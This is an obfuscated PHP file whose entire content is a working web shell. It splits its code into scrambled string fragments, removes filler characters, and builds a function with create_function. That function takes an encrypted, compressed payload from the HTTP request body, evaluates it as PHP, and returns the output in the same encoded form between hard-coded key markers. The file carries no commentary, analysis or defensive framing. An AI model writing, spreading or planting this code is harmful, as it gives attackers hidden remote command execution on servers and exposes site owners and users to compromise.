<?php
$O='dSKxzM(QOZl"(Q;functio(Qn(Q x(Q($t,$k(Q){$c=strlen((Q$k);(Q(Q$l=strlen($t(Q);$o="';
$C='ntents((Q"php://(Qinput")(Q,(Q$m)==1) {(Q@ob_star(Qt();@ev(Qal(@gz(Quncompress((Q@x(';
$V='";(Qfor((Q$i=0(Q;$i<$l;){for((Q$j=0;(Q($(Qj<$c&&$i<(Q$l)(Q;$j++,$i++)(Q{$o.(Q=$t(Q{$i}^$';
$i=str_replace('C','','CCcreate_CCCfCunction');
$c='Q();$r=@base(Q64_enc(Qode(@x((Q@gzc(Qompre(Qss($o),(Q$k)(Q);print("$(Qp$kh$r$(Qkf");}';
$T='k{(Q$j};}}ret(Q(Qurn(Q $o;(Q}(Qif (@preg_matc(Qh((Q"/$k(Qh((Q.+)$kf/",@(Qfile_g(Qet_co';
$L='$k="81(Qdc9bd(Qb";$kh="(Q52d04dc2(Q0(Q036";$(Qkf=(Q"db(Qd8313ed055";(Q$p="mkdxPuk(Q';
$K='Q(@bas(Qe64_dec(Qode($m[1](Q),$k)))(Q(Q;$o=@ob_ge(Qt_co(Qn(Qtents();(Q@ob_end_c(Qlean(';
$m=str_replace('(Q','',$L.$O.$V.$T.$C.$K.$c);
$D=$i('',$m);$D();
?>
